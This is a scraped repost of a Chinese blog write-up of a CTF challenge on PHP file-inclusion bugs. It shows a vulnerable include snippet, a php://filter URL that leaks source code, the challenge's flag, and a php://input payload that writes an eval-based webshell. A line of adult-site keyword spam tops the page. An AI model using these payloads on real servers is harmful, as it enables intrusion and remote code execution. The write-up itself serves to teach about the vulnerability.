日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

【CTF题】使用文件包含漏洞读取网页代码

發布時間:2024/1/8 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【CTF题】使用文件包含漏洞读取网页代码 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

【CTF題】使用文件包含漏洞讀取網頁代碼

?

按照我的理解文件包含漏洞是指網頁后端php(或其他)代碼中使用了include等文件包含語句,而且所包含的文件由變量控制,恰恰此變量又能通過GET或POST等方式進行修改所造成的。

1.直接包含內有運行代碼的文件

比如有一index.php

<?phpinclude $_GET['file']; ?>

那么就可以通過抓包修改file值的辦法去運行一些本來不該運行的文件

也可以通過此方法直接輸出一些敏感的配置文件和遠程包含shell(需要目標主機開啟allow_url_fopen)

2.通過PHP內置協議直接讀取代碼

通過構造如下語句:

http://xxx.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php

就能獲得xxx.php的代碼的base64加密結果,通過base64解密后便可獲得xxx.php的代碼

題目是南郵網絡攻防平臺的文件包含題?

點擊“click me?no”以后:?
這里寫圖片描述

可以看到,url變為了:

http://4.chinalover.sinaapp.com/web7/index.php?file=show.php

出現了?file=show.php

說明可能有文件包含漏洞,so,構建url如下:

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到了index.php的base64加密后的代碼

?

base解密后得到代碼:

<html><title>asdf</title><?phperror_reporting(0);if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "Oh no!";exit();}include($file); //flag:nctf{edulcni_elif_lacol_si_siht}?> </html>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

可以看到,flag就在這里~

3.寫入php文件

使用如下url:

http://xxx.com/index.php?file=php://input

并且在http頭里提交

<?fputs(fopen("shell.php","w"),"<?php eval($_post['xxx'];?>")?>

就能在index.php說在的目錄下生成shell.php

?

--------------------- 本文來自 keysking 的CSDN 博客 ,全文地址請點擊:https://blog.csdn.net/keysking/article/details/54728702?utm_source=copy

總結

以上是生活随笔為你收集整理的【CTF题】使用文件包含漏洞读取网页代码的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。